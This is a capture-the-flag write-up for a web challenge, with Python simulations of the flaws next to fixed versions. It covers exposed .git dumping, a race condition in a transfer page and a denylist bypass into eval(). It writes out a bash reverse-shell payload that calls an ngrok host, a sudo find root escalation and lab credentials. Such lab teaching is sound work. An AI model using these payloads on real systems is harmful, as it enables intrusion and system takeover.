Day 3 Challenge Writeups



Vulnbydefault Day 3 Writeup
On opening the site URL we are given the following interface:

It has login functionality but no way to register.
Recon
Let's start enumeration.
First we check the source of the index page.

Let's use CyberChef to decode that encoded string; use this site:

Let's fuzz the site.

There is a .git directory. You can also use this browser extension, which helps spot exposed .git directories on machines: https://addons.mozilla.org/en-US/firefox/addon/dotgit/
Let's use git-dumper to dump the .git directory: https://github.com/arthaud/git-dumper
You can install it with the following command:
pip install git-dumper
Now we dump the git repository:
git-dumper <.git URL> <output directory>
git-dumper http://127.0.0.1:3001/.git/HEAD source


Here we find a robots.txt file.

Let's check the git log together with the diffs:
git log -p

Let's log in as any user.

We got the second flag.

Let's check credit card eligibility.


Let's check eligibility.

Alright, we need a balance of at least 11000.

But we only have 5000 in our account. Let's check the transfer page:

So it takes a recipient username and an amount. Let's check transfer.php:

Alright, it checks whether the recipient is alice or bob.
We can see in the source that there is no logic guarding against a race condition: nothing stops several transfers from passing the balance check at the same time.
Let's test for a race condition.
Intercept the transfer request.

Send it to Repeater and create a tab group.


Select the last option, for parallel requests.

Now click send group (parallel).

Now check the dashboard.

It has a negative balance.
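What happened above, as an added example that is not the challenge's code: a simulation of the check-then-act race in a transfer endpoint like transfer.php, next to a version that serialises the check and the debit. The class names, the starting balances (5000 for the sender, mirroring the account above) and the Barrier used to make every parallel request pass the balance check before any debit lands are assumptions; on the real target the same effect came from Burp's send group (parallel).

```python
import threading


class VulnerableBank:
    """transfer(): the balance check and the debit are two separate statements,
    so parallel requests can all pass the check before any debit is applied."""

    def __init__(self, balances):
        self.balances = dict(balances)
        self._stmt = threading.Lock()   # each individual "SQL statement" is atomic on its own

    def transfer(self, src, dst, amount, barrier=None):
        with self._stmt:                 # SELECT balance FROM users WHERE name = src
            enough = self.balances[src] >= amount
        if not enough:
            return False
        if barrier is not None:
            barrier.wait()               # every request is past the check now (assumes all n pass it)
        with self._stmt:                 # UPDATE users SET balance = balance - amount WHERE name = src
            self.balances[src] -= amount
        with self._stmt:                 # UPDATE users SET balance = balance + amount WHERE name = dst
            self.balances[dst] += amount
        return True


class FixedBank(VulnerableBank):
    """Check and debit run as one critical section (the DB analogue is a transaction
    with SELECT ... FOR UPDATE, or a single UPDATE ... WHERE balance >= amount)."""

    def transfer(self, src, dst, amount, barrier=None):
        if barrier is not None:
            barrier.wait()               # requests still arrive at the same instant...
        with self._stmt:                 # ...but check and debit are serialised
            if self.balances[src] < amount:
                return False
            self.balances[src] -= amount
            self.balances[dst] += amount
            return True


def fire_parallel(bank, src, dst, amount, n):
    """Send n identical transfer requests at once (what Burp's 'send group (parallel)'
    does) and return how many of them the server accepted."""
    barrier = threading.Barrier(n)
    results = []
    done = threading.Lock()

    def worker():
        ok = bank.transfer(src, dst, amount, barrier)
        with done:
            results.append(ok)

    threads = [threading.Thread(target=worker) for _ in range(n)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return sum(results)


def demo():
    """Three parallel transfers of the full 5000 balance: the vulnerable bank accepts
    all three and drives the sender negative, the fixed bank accepts exactly one."""
    start = {"alice": 5000, "bob": 0}   # constructed balances
    vuln = VulnerableBank(start)
    vuln_accepted = fire_parallel(vuln, "alice", "bob", 5000, 3)
    fixed = FixedBank(start)
    fixed_accepted = fire_parallel(fixed, "alice", "bob", 5000, 3)
    return {
        "vuln_accepted": vuln_accepted, "vuln_balances": vuln.balances,
        "fixed_accepted": fixed_accepted, "fixed_balances": fixed.balances,
    }


if __name__ == "__main__":
    print(demo())
```

The per-statement lock is deliberate: the bug is not that a single UPDATE is unsafe, it is that the read in one statement and the write in another are not one unit, which is exactly what the parallel Repeater group exploits.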
Let's log in as bob:
bob:bobisgoat
We have another flag.

Now we are eligible for the card.
Let's check eligibility, since bob's balance is greater than 11000.
Before that, let's check the source code of eligibility.php:

So our input is checked against a list first and then passed to eval().
system is not in that check list, so let's use that function.
Intercept the request in Burp Suite.
In captcha_num2 I change the value to system("id").

Alright, we have RCE.
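Why the denylist did not help, as an added example (not the challenge's eligibility.php, which is PHP): a Python analogue of the captcha check that filters the raw strings against a short list of names and then eval()s the arithmetic built from them, next to a version that never turns input into code. The field names follow the request above; the denylist contents and the bypass payload (os.getpid() instead of system("id"), so it runs harmlessly anywhere) are assumptions.

```python
import os
import re

# Assumed denylist, standing in for the challenge's "check list": a few
# dangerous names, but not system, and not __import__ or os either.
DENYLIST = ("exec", "shell_exec", "passthru", "popen")

HONEST_FORM = {"captcha": "9", "captcha_num1": "3", "captcha_num2": "6"}  # constructed
BYPASS_FORM = {"captcha": "9", "captcha_num1": "3",
               "captcha_num2": "__import__('os').getpid()"}                # constructed payload


def vulnerable_solve(form):
    """Analogue of the vulnerable check: denylist the raw strings, then eval()
    the expression built from them. Anything not on the list runs as code."""
    expr = f"{form['captcha_num1']}+{form['captcha_num2']}"
    if any(name in expr.lower() for name in DENYLIST):
        raise ValueError("blocked by denylist")
    return eval(expr)  # user-controlled text reaches eval(): code execution


def vulnerable_captcha_ok(form):
    return int(form["captcha"]) == vulnerable_solve(form)


def safe_int(value, max_digits=3):
    """Accept only a short run of digits; anything else is rejected, never evaluated."""
    if not re.fullmatch(r"[0-9]{1,%d}" % max_digits, value):
        raise ValueError(f"not a small integer: {value!r}")
    return int(value)


def hardened_captcha_ok(form):
    """Parse the operands and the answer as bounded integers and compare them.
    No string is ever interpreted, so there is nothing for a denylist to miss."""
    return safe_int(form["captcha"]) == safe_int(form["captcha_num1"]) + safe_int(form["captcha_num2"])


def demo_bypass():
    """The denylist lets __import__ and os through, so the operand executes
    os.getpid() inside eval(). On the target the same slot carried system("id")."""
    return vulnerable_solve(BYPASS_FORM) == 3 + os.getpid()


def hardened_rejects(form):
    """True when the hardened check refuses the input instead of evaluating it."""
    try:
        hardened_captcha_ok(form)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("honest input, vulnerable:", vulnerable_captcha_ok(HONEST_FORM))
    print("honest input, hardened: ", hardened_captcha_ok(HONEST_FORM))
    print("bypass executed code:   ", demo_bypass())
    print("hardened rejects bypass:", hardened_rejects(BYPASS_FORM))
```

Even with eval() gone, the design above is still weak: the request carries captcha_num1, captcha_num2 and the answer, all chosen by the client, so the check proves nothing. The server should generate the two numbers itself, keep the expected answer in the session, and compare only the submitted answer against it.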

Let's use a reverse shell payload. First start a listener on any port (I use 4001) and expose it with ngrok:
nc -lvnp 4001
ngrok tcp 4001

credit_score=300&address=Sulitech&requested_balance=50&usage_purpose=online_use&captcha=9&captcha_num1=3&captcha_num2=system("bash -c 'bash -i >& /dev/tcp/<ngrok host>/<ngrok port> 0>&1'")
The payload value contains & and other characters that are special in a form body, so URL-encode it in Burp before sending.
Got a shell.

Let's check /etc/passwd.

We have a developer user. Let's check the web root.

Let's check the db folder.

Let's check the initialize.php file.

So we got the developer user's password:
developer:rootm3l3ts$33

Use this to stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
In /home/developer we have user.txt.

Let's check sudo -l.

Go to this site:

sudo find . -exec /bin/sh \; -quit
